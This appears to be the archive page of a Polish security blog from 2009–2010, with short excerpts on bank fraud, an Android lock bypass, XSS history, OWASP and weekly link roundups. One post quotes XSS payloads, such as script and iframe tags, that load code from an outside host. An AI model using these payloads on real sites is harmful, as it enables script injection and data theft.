ThinkSecure - Michał Wiczyński

I jak tu (nie) ufac

2010-01-29T01:39:00.000-08:00

By Rob Preece Crime Correspondent "A FORMER anti-fraud boss at the Yorkshire-based bank First Direct has been jailed for stealing from customers' accounts to fund his alcoholism and cocaine addiction. In his £65,000-a-year job as head of fraud operations, Richard Crawford, 41, was trusted with the personal details of account holders whose finances were thought to be most at risk from criminals."

Niebezpieczny Droid

2010-01-12T04:36:00.000-08:00

Zła wiadomość dla użytkowników Droid'a. Android OS ver. 2.0.1, czyli aktualna wersja na której działa Droid, posiada lukę bezpieczeństwa która umożliwia obejście zabezpieczenia blokady ekranu. Zabezpieczenie polega na połączeniu kropek na ekranie, w taki sposób jaki wcześniej został zdefiniowany przez użytkownika. (iPhone posiada podobną opcję). Obejście zabezpieczenia jest niezwykle łatwe.

Stalowa chrona kart zbliżeniowych

2009-12-19T07:32:00.000-08:00

Posiadając, ostatnio często reklamowane przez różne bank, kartę zbliżeniową, jesteśmy narażeni na możliwość zczytania z niej danych. W jaki sposób możemy się zabezpieczyć przed złodziejami? Z pomocą przychodzi portfel 'utkany ze stali'. Według opisu producenta, posiadając taki portfel, możemy się odprężyć i być spokojni, że nasze dane pozostaną przy nas. Portfel utkany jest z ponad 20.000

#10 'te #urodziny #xss ! sto lat sto lat :)

2009-12-16T03:10:00.000-08:00

16-ego stycznia, 2000, dla małej grupki inżynierów w Microsoft, zostaly zasugerowane nastepujace nazwy: Unauthorized Site Scripting Unofficial Site Scripting URL Parameter Script Insertion Cross Site Scripting Synthesized Scripting Fraudulent Scripting Następnego dnia uzgodniono nazwę - Cross Site Scripting. Na początku lutego, wypuszczono dokument (CERT): http://www.cert.org/advisories/CA-

(update) do (in)security tygodnia

2009-12-09T04:14:00.001-08:00

Nie wiem czemu ale zapodzialo mi się to gdzieś, więc wstawiam teraz: http://www.heise-online.pl/security/news/item/Nowy-sposob-lamania-szyfru-AES-878754.html Nowy sposób na #łamanie #AES #security #crypto

All in one exploit...s !

2009-12-09T03:07:00.000-08:00

Witam. Dzisiaj w moje raczki wpadla super paczka mini tyci exploitow ;) Otoz pan sirdarckcat przed chwilą opublikował niezły zestaw exploitów all in one. Oto one: http://0x.lv/xss.xml XBL+XHTML http://0x.lv/xss.css (binding/expression/jsuri) http://0x.lv/xss.swf (getURL) <script src=//0x.lv> LUB <link rel=stylesheet href=//0x.lv> LUB <img src=//0x.lv> LUB <iframe src=//0x.lv> także: XHR/

(in)security tygodnia

2009-12-08T17:17:00.000-08:00

Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek ze świata security: http://www.net-security.org/secworld.php?id=8594 #Fake #fingerprint fools #biometric #devices #security http://www.heise-online.pl/security/news/item/Ostatnia-deska-ratunku-UFO-hakera-877758.html Ostatnia deska ratunku "#UFO-#haker a"#Gary ’ego #McKinnon a http://www.networkworld.com/news/2009/120709-

OWASP TOP10 2010 RC1 PL

2009-12-02T14:10:00.000-08:00

W związku z niedawno opulbikowanym #OWASP TOP10 RC1 http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project postanowiłem przetłumaczyć dokument, wzbogacając go o parę własnych zdań. Dokument pobieramy tutaj: http://www.slideshare.net/thinksecure/owasp-top10-2010-rc1-pl Aktualizacja: Zapraszam rowniez na: http://pentester.jogger.pl/2009/12/02/owasp-top-10/ Owasp Top10 2010 RC1 PLView

(in)security tygodnia

2009-12-01T09:17:00.000-08:00

Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek ze świata security: http://www.heise-online.pl/security/news/item/Exploit-dajacy-uprawnienia-roota-w-FreeBSD-Uzupelnienie-873354.html #Exploit dający uprawnienia roota w #FreeBSD #security #root http://www.thespanner.co.uk/2009/11/23/ping-pong-obfuscation/ #Obfuskacja w obfuskacji obfuskacji... #xss #

CSP na kolana

2009-11-23T03:49:00.000-08:00

Gareth Heyes opublikował właśnie na swoim blogu, informację dotyczącą sposobu ominięcia zabezpieczeń w #CSP http://www.thespanner.co.uk/2009/11/23/bypassing-csp-for-fun-no-profit/ Na czym polega błąd? Każda strona z feedem JSON'a nad którym może mieć kontrolę atakujący, może zostać zarażona własnym ciągiem JSON'a, dzięki czemu można kontrolować pozostałe elementy feed'a. Wyjaśnijmy to na

Każdy lubi puknąć

2009-11-18T05:15:00.000-08:00

Przeglądając lifehack'i, trafiłem na dosyć ciekawe zastosowanie pukania jako klucza do drzwi. Muszę przyznać, że pomysł jest naprawdę oryginalny, ale ma wiele wad i raczej nie znajdzie zastosowania jako zabezpieczenie drzwi wejsciowych od domu. http://www.engadget.com/2009/11/04/secret-knock-door-lock-defends-home-from-rhythmically-impaired/

Infiltracja w Polsce

2009-11-18T04:36:00.001-08:00

No proszę, myślałem że już nic mnie w tym kraju nie zaskoczy, a tu takie numery... http://osnews.pl/rzad-ujawnil-projekt-filtrowania-internetu-w-polsce/

CONFidence 2.0

2009-11-18T04:16:00.000-08:00

To już jutro, Agenda: http://200902.confidence.org.pl/agenda/ Zapowiada się naprawdę ciekawie :) Jednak widzę, że ponownie będzie problem z wyborem niektórych wykładów, np: Gareth Heyes XSS Lightsabre techniques using Hackvertor oraz w tym samym czasie: Frank Breedijk AutoNessus: analyzing vulnerability assessment data the easy way… tak samo: Gynvael Coldwind Practical security in computer

(in)security tygodnia

2009-11-17T06:25:00.000-08:00

Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek ze świata security: http://www.examiner.com/x-14651-Minneapolis-Information-Technology-Examiner~y2009m11d11-Cenzic-wants-to-make-sure-your-Web-site-is-healthy?cid=email-this-article #Cenzic wants to make sure your #Web site is #healthy http://www.darknet.org.uk/2009/11/ssl-renegotiation-bug-succesfully-used-to-attack-twitter/ #

(in)security tygodnia

2009-11-10T01:52:00.000-08:00

Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek: http://blog.securitystandard.pl/news/352111.html - Łamanie haseł w chmurze #pgp #lamanie #security #cloud http://blogs.zdnet.com/security/?p=4805 - iHack wirus na iPhone #iphone #wirus #security #jail http://livelabs.com/web-sandbox/ - Web sandbox od microsoft #microsoft #web #security #sandbox http://chuvakin.blogspot.com/2009

str0ke nie żyje, milw0rm

2009-11-04T01:18:00.000-08:00

bl4cksecurity.blogspot.com/2009/11/str0ke-milworms-funeral-is-this-friday.html Many of us have wondered where str0ke has been and why #milw0rm has not been updated in a good while. I recently was informed that #str0ke has been hospitalized due to a strange condition with his heart, which he has had since he was a child.Sadly....I've just received information that str0ke @ milw0rm has passed away

(in)security tygodnia

2009-11-02T15:40:00.000-08:00

Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek: http://blog.itsecurityexpert.co.uk/2009/11/how-secure-is-your-uk-online-banking.html - odnośnie ostatniego wpisu http://www.heise-online.pl/security/news/item/Hasla-wielowyrazowe-w-systemie-platnosci-Amazona-846478.html http://www.securitum.pl/baza-wiedzy/publikacje/zdalny-root-na-routerze-soho http://

nie-Bezpieczenstwo w bankowości internetowej.

2009-10-27T10:33:00.000-07:00

Przymierzałem się do napisania notki odnośnie w/w tematu, ale Przemysław Skowron zrobił to wcześniej na swoim blogu :) Nie zamierzam rezygnować z wpisu, więc... Raport czytało się przyjemnie, ale tak jak wspomniał kolega P. Skowron, również podszedłbym do sprawy bezpieczeństwa w bankowości internetowej trochę z innej strony. Załóżmy, że klient posiadający działalność gospodarczą posiada konto

(in)security tygodnia

2009-10-27T03:48:00.000-07:00

Postanowiłem, co tydzień we wtorek, dzielić się z wami ciekawostkami z świata (in)security. Spośród setek informacji z różnych portafi wybrałem, moim zdaniem, te najciekawsze. Miłej lektury ;) http://www.readwriteweb.com/archives/android_tor.php http://pentestit.com/2009/10/26/dirsnatch-check-directory-listings-web-root/ http://isc.sans.org/diary.html?storyid=7450 http://rcpmag.com/

ryzyko podatność skutek zagrożenie błąd...

2009-10-09T05:40:00.000-07:00

Podczas ostatniej konferencji (GigaCon BIN- Bezpieczenstwo i niezawodnosc) miałem możliwość wziąć udział w bardzo ciekawym wykładzie. Pani X (niestety nie pamiętam nazwiska, jeżeli ktoś był i zanotował to proszę o kontakt) rozpoczęła wykład od wytłumaczenia różnicy między zagrożeniem, ryzykiem, podatnością a skutkiem. Okazuje się, że wiele osób myli w/ w pojęcia. Wyjaśniono, że: - podatność to

A jednak

2009-10-08T17:51:00.000-07:00

Witam wszystkich. Zlamalem sie, zalozylem bloga :) Znajdziecie tu: ...czas pokaze